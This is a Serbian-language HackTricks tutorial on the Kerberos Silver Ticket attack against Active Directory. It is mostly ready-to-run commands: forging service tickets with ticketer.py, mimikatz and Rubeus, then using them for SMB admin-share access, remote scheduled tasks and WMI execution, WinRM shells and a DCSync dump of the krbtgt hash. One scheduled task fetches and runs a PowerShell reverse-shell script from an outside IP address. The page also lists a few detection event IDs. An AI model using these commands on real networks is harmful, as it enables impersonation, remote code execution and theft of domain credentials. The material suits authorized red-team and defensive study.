HackTricksSilver Ticket
Reading time: 5 minutes
tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Silver ticket
Napad Silver Ticket uključuje eksploataciju servisnih karata u Active Directory (AD) okruženjima. Ova metoda se oslanja na dobijanje NTLM heša servisnog naloga, kao što je nalog računara, kako bi se falsifikovala Ticket Granting Service (TGS) karta. Sa ovom falsifikovanom kartom, napadač može pristupiti specifičnim uslugama na mreži, pretvarajući se da je bilo koji korisnik, obično sa ciljem sticanja administratorskih privilegija. Naglašava se da je korišćenje AES ključeva za falsifikovanje karata sigurnije i manje uočljivo.
Za kreiranje karata koriste se različiti alati u zavisnosti od operativnog sistema:
On Linux
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
Na Windows-u
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"
# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
CIFS servis je istaknut kao uobičajena meta za pristupanje fajl sistemu žrtve, ali se i drugi servisi kao što su HOST i RPCSS takođe mogu iskoristiti za zadatke i WMI upite.
Dostupne Usluge
| Tip Usluge | Usluge Silver Tiketi |
|---|---|
| WMI | HOST RPCSS |
| PowerShell Daljinsko Upravljanje | HOST HTTP U zavisnosti od OS-a takođe: WSMAN RPCSS |
| WinRM | HOST HTTP U nekim slučajevima možete samo tražiti: WINRM |
| Zakazani Zadaci | HOST |
| Windows Deljenje Fajlova, takođe psexec | CIFS |
| LDAP operacije, uključujući DCSync | LDAP |
| Windows Alati za Daljinsku Administraciju | RPCSS LDAP CIFS |
| Zlatni Tiketi | krbtgt |
Korišćenjem Rubeus možete tražiti sve ove tikete koristeći parametar:
/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm
ID događaja Silver tiketa
- 4624: Prijava na nalog
- 4634: Odjava sa naloga
- 4672: Prijava administratora
Zloupotreba Usluga tiketa
U sledećim primerima zamislimo da je tiket preuzet imitujući administratorski nalog.
CIFS
Sa ovim tiketom bićete u mogućnosti da pristupite C$ i ADMIN$ folderu putem SMB (ako su izloženi) i kopirate fajlove u deo udaljenog fajl sistema jednostavno radeći nešto poput:
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
Moći ćete da dobijete shell unutar hosta ili izvršite proizvoljne komande koristeći psexec:
HOST
Sa ovom dozvolom možete generisati zakazane zadatke na udaljenim računarima i izvršiti proizvoljne komande:
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
HOST + RPCSS
Sa ovim tiketima možete izvršiti WMI u sistemu žrtve:
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
wmic remote.computer.local list full /format:list
Pronađite više informacija o wmiexec na sledećoj stranici:
HOST + WSMAN (WINRM)
Sa winrm pristupom preko računara možete pristupiti i čak dobiti PowerShell:
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
Proverite sledeću stranicu da biste saznali više načina za povezivanje sa udaljenim hostom koristeći winrm:
warning
Imajte na umu da winrm mora biti aktivan i slušati na udaljenom računaru da biste mu pristupili.
LDAP
Sa ovom privilegijom možete dumpovati DC bazu koristeći DCSync:
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
Saznajte više o DCSync na sledećoj stranici:
Reference
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
- https://www.tarlogic.com/blog/how-to-attack-kerberos/
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.